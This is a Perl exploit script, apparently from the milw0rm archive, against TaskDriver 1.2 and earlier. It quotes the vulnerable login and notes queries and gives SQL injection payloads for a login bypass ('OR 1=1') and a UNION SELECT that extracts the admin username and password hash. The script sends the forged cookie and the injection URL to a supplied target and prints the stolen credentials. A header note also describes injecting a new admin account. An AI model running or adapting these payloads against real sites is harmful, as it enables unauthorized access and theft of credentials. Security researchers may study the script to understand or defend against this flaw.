TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit#!/usr/bin/perl -w

#################################################################################
#										#
#	      TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit		#
#										#
# Discovered by: Silentz							#
# Payload: Login Bypass &amp; Admin Username &amp; Hash Retrieval			#
# Website: http://www.w4ck1ng.com						#
# 										#
# Vulnerable Code (login.php): 							#
#										#
# $sql = `SELECT * FROM  $userstable WHERE username = '$_POST[username]' AND    #
#         password = md5('$_POST[password]')`;					#
#										#
# Vulnerable Code (notes.php):							#
#       									#
# $taskid = $_GET['taskid'];							#
# $sql = `SELECT * FROM $taskstable WHERE taskid = '$taskid'`;			#
#										#
# PoC: http://victim.com/login.php						#
#      In username box input: ' OR 1=1 /*					#
#      In password box: [ANYTHING OR NOTHING]					#
#										#
#      OR: 									#
#										#
#      http://victim.com/notes.php?taskid=-999' UNION SELECT 0,0,username,      #
#      0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*		#
# 										#
# Subject To: magic_quotes_gpc set to off					#
# GoogleDork: Get your own!							#
# Notes: You can do a UNION INSERT in the password reset form to add an admin	#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
#################################################################################

use LWP::UserAgent;
if (@ARGV < 1){
print `-------------------------------------------------------------------------\r\n`;
print `           TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n`;
print `-------------------------------------------------------------------------\r\n`;
print `Usage: w4ck1ng_taskdriver.pl [PATH]\r\n\r\n`;
print `[PATH] = Path where TaskDriver is located\r\n\r\n`;
print `e.g. w4ck1ng_taskdriver.pl http://victim.com/taskdriver/\r\n`;
print `-------------------------------------------------------------------------\r\n`;
print `            		 http://www.w4ck1ng.com\r\n`;
print `            		        ...Silentz\r\n`;
print `-------------------------------------------------------------------------\r\n`;
exit();
}

$b = LWP::UserAgent->new() or die `Could not initialize browser\n`;
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$cookie = `fook%21%27+or+1%3D1+%2F%2A;`;
$host = $ARGV[0] . `notes.php?taskid=-999' UNION SELECT 0,0,username,0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*`;

my @cookie = ('Cookie' => `auth=$cookie;`);
my $res = $b->get($host, @cookie);

$answer = $res->content;
if ($answer =~ /notes on (.*?)<\/u><\/td><\/tr>/){
print `-------------------------------------------------------------------------\r\n`;
print `            TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n`;
print `-------------------------------------------------------------------------\r\n`;
print `[+] Admin User : $1\n`;
}

if ($answer =~/([0-9a-fA-F]{32})<\/font>/){
print `[+] Admin Hash : $1\n`;
print `-------------------------------------------------------------------------\r\n`;
print `            		 http://www.w4ck1ng.com\r\n`;
print `            		        ...Silentz\r\n`;
print `-------------------------------------------------------------------------\r\n`;
}

# milw0rm.com [2007-05-10]